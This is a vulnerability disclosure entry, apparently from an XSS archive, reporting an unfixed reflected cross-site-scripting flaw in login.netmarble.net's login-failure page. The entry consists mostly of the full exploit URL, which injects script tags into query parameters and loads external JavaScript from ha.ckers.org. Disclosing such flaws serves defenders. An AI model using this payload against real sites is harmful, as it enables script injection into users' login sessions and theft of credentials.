Security researcher d3vbit3, has submitted on 13/05/2011 a cross-site-scripting (XSS) vulnerability affecting login.netmarble.net, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 13/05/2011 |
Date published: 13/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: d3vbit3 |
Domain: login.netmarble.net |
Category: XSS |
Pagerank: 0 |
URL: http://login.netmarble.net/login/LoginFail.asp?l_type=1&l_failcnt=&l_errcode=-2&l_errmsg=%%22%3E%3CS CRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E%2527%253E%253Cstrong%253E%25uB85C%25uADF8%25u C778%25uC5D0%2520%25uC2E4%25uD328%25uD558%25uC600%25uC2B5%25uB2C8%25uB2E4.%253C%2Fstrong%253E%253Csp an%2520class%253D%2527txt%2527%253E%25uC544%25uC774%25uB514%2F%25uBE44%25uBC00%25uBC88%25uD638%2520% 25uD655%25uC778%2520%25uD6C4%2520%25uB2E4%25uC2DC%2520%25uB85C%25uADF8%25uC778%25uD574%25uC8FC%25uC1 38%25uC694.%253Cbr%2520%2F%253E2009%25uB144%25201%25uC6D4%252013%25uC77C%2520%25uC774%25uC804%25uC5D 0%2520%25uBE44%25uBC00%25uBC88%25uD638%25uB97C%2520%25uC124%25uC815%25uD558%25uC168%25uB2E4%25uBA74% 2520%25uD655%25uC778%25uD574%25uC8FC%25uC138%25uC694.%253Cspan%2520class%253D%2527button%2520bt_s3%2 527%253E%253Cbutton%2520type%253D%2527button%2527%2520style%253D%2522width%253A148px%2522%2520onclic k%253D%2522openWinW%2528%2527http%253A%2F%2Flogin.netmarble.net%2Flogin%2FPopPasswordNotice.asp%2527 %252C%2527noticeWin%2527%252C450%252C488%252C%2527%2527%252C%2527%2527%252C0%252C0%2529%253B%2520ret urn%2520false%253B%2522%253E%25uBE44%25uBC00%25uBC88%25uD638%2520%25uC790%25uB9AC%25uC218%2520%25uBC C0%25uACBD%25uC548%25uB0B4%253C%2Fbutton%253E%253C%2Fspan%253E%253C%2Fspan%253E%253C%2Fspan%253E%253 C%2Fdiv%253E&l_which=0&l_irclogin=1&l_etc=&l_id=cc&l_domain=&l_sname=&l_url=http%253A%252F%252Ffps%2 52Enetmarble%252Enet%252F%253Fsa%2522%253E%253CSCRIPT%2BSRC%253Dhttp%253A%252F%252Fha%252Eckers%252E org%252Fxss%252Ejs%253E%253C%252FSCRIPT%253E&l_dirurl=0&l_idstate=&l_gender=&l_deallevel=&l_dealleve ldetail=&l_stopdate=&l_dealreason=&l_targetdate=&l_ispwdabuser=0&l_lockedIp=0&EncLoginid= |
Click here to view the mirror
|
|
|